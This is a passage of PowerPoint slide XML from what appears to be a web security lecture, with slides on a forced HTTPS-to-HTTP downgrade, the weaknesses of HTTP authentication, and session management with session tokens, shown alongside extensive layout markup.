          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Location http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Group 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75C475FF-A9E8-994C-8253-FD136D665A51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3797447" y="4710628"/>
            <a:ext cx="2230560" cy="1423800"/>
            <a:chOff x="1715428" y="4710628"/>
            <a:chExt cx="2230560" cy="1423800"/>
          </a:xfrm>
        </p:grpSpPr>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58666C4F-B4E3-CE4B-8B09-8237303876D1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1715428" y="4710628"/>
                <a:ext cx="2230560" cy="1267560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="31" name="Ink 30">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58666C4F-B4E3-CE4B-8B09-8237303876D1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId23"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1697788" y="4692988"/>
                  <a:ext cx="2266200" cy="1303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37F7EFCA-0277-FC41-9A6B-DA8CC2C112A6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3725668" y="5968828"/>
                <a:ext cx="205920" cy="165600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="32" name="Ink 31">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F7EFCA-0277-FC41-9A6B-DA8CC2C112A6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId25"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3707668" y="5951188"/>
                  <a:ext cx="241560" cy="201240"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95A02449-0FDA-B64F-BC08-FF5BF8E34B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994155" y="4877918"/>
            <a:ext cx="1739579" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="TextBox 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22030B62-FAD0-0845-B0EE-51A3370FD2CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2880987" y="5191901"/>
            <a:ext cx="814647" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rectangle 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81B63A1A-0F90-E945-8CBA-712BCCD326FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5992857" y="6150628"/>
            <a:ext cx="5838940" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>resources.enablesecurity.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/resources/Surf%20Jacking.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80B2513-60E1-8541-A4A9-D4675129D194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113215" y="1914742"/>
            <a:ext cx="3668335" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTPS-&gt;HTTP downgrade</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33934973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6" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="44" grpId="0"/>
      <p:bldP spid="45"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6146" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019685FF-ACA6-1847-B123-86EFA6FEC452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463648" y="891241"/>
            <a:ext cx="4199056" cy="5075519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Problems with HTTP Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="78" name="Straight Connector 77">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47" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B200979E-D12B-344E-BE95-F43E15DE9E78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300812" y="891241"/>
            <a:ext cx="5978834" cy="5075519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Can only log out by closing browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>What if user has multiple accounts?  Multiple users of the same browser?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Cannot customize password dialog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Easily spoofed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>In old browsers, defeated by TRACE HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>TRACE causes Web server to reflect HTTP back to browser, TRACE via XHR reveals password to a script on the web page, can then be stolen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Hardly used in commercial sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="445779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9EBE4D1-0903-124D-8994-F0C2CF5E9D8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Session Management with Session Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13315" name="Group 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770AD3CF-590E-0044-8A72-35C9FD9E66B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="1844676"/>
            <a:ext cx="1219200" cy="4343400"/>
            <a:chOff x="381000" y="2133600"/>
            <a:chExt cx="1219221" cy="4343400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56347" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A5842B-8A72-2843-9D6F-F7350EC668A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="381000" y="2133600"/>
              <a:ext cx="1219221" cy="4343400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="12700" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323015" name="Text Box 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9986842B-90C6-5C41-A511-3B223DB479F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="444014" y="2178155"/>
              <a:ext cx="955727" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13316" name="Group 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C489ADF-4129-FC42-9E2D-5B00B0EDAFD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8839201" y="1828800"/>
            <a:ext cx="1219200" cy="4343400"/>
            <a:chOff x="7315200" y="2133600"/>
            <a:chExt cx="1219337" cy="4343400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56345" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F136FC7-C9F5-7D46-98AC-3411A14E32E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7315200" y="2133600"/>
              <a:ext cx="1219337" cy="4343400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="12700" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323017" name="Text Box 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61CE5F4F-40A0-F140-B03B-122DE18EA281}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7422318" y="2198622"/>
              <a:ext cx="962231" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Website</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56341" name="Straight Arrow Connector 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5956819-1BE3-0F45-A3AF-C0AAF73B0DB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="2133600"/>
            <a:ext cx="5105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42" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21C4FFE7-EAB4-724E-AC6C-E6AB74EE98FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581401" y="1676400"/>
            <a:ext cx="1717137" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET /index.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56343" name="Straight Arrow Connector 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59F644D-AE21-0A4F-A948-AE737FDD3CD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3603626" y="2587625"/>
            <a:ext cx="5235575" cy="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44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C26D315-E814-6244-88B2-32B6176E57B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2281238"/>
            <a:ext cx="4224338" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set anonymous session token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D888137-7FF5-F940-B1AD-49F1DDA343C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="2951606"/>
            <a:ext cx="5105400" cy="646331"/>
            <a:chOff x="1600200" y="2951744"/>
            <a:chExt cx="5105400" cy="646195"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13331" name="Straight Arrow Connector 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{849508DA-EFE7-FA48-B058-8EA7954C8FD2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1600200" y="3299182"/>
              <a:ext cx="5105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40" name="TextBox 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3EF2122-1E09-4840-A2DE-7AEA3757F4F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="2951744"/>
              <a:ext cx="2666114" cy="646195"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>GET /opencontent.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>anonymous session token</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56335" name="Straight Arrow Connector 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3274623-0616-BD44-9260-F385F9210570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="4311650"/>
            <a:ext cx="5105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36" name="TextBox 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7864C79-10F5-D746-A688-A168D468443B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3603625" y="3983862"/>
            <a:ext cx="2568332" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
